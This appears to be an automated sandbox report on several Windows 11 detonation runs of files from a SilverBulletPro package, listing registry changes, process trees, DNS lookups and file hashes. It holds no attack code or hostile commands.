| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.Core.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
108s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe\shell\open\command | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 8c00310000000000a858066e110050524f4752417e310000740009000400efbec5525961a858066e2e0000003f0000000000010000000000000000004a0000000000284ec700500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe\shell\open\command\ = "\"C:\\Program Files\\dotnet\\dotnet.exe\" \"%1\"" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe\shell\open | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \Registry\User\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\NotificationData | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5400310000000000a858fc681000646f746e657400003e0009000400efbea858dd68a858fc682e000000426102000000070000000000000000000000000000008a68550064006f0074006e0065007400000016000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe\shell | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1920 wrote to memory of 4924 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\dotnet\dotnet.exe |
| PID 1920 wrote to memory of 4924 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\dotnet\dotnet.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.Win.Core.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\dotnet\dotnet.exe
"C:\Program Files\dotnet\dotnet.exe" "C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.Win.Core.pdb"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 82bac6fce939eae430b9026af0652640 |
| SHA1 | 302d6396f755a86b0dbd525c7a5b240656a2039a |
| SHA256 | c0a43af23fa910206e3d6507243d572564b1afc64dbb02ff6a24ff039aaa4511 |
| SHA512 | 6348a61b2835fb84cb22d570766534c819ac7077b683345057e1afae8cf5c23455499e28bba3aa736dfec3de186ac4b3c5276c16c55d16b311825570a794d7f4 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
140s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\ios-arm64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240419-en
Max time kernel
75s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.Requests.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
80s
Max time network
101s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\maccatalyst-arm64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| NL | 52.111.243.30:443 | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
70s
Max time network
99s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.CLI.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
142s
Max time network
156s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "3488757114" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31111933" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1504 wrote to memory of 1068 | N/A | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE | C:\Program Files\Internet Explorer\iexplore.exe |
| PID 1504 wrote to memory of 1068 | N/A | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE | C:\Program Files\Internet Explorer\iexplore.exe |
Processes
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
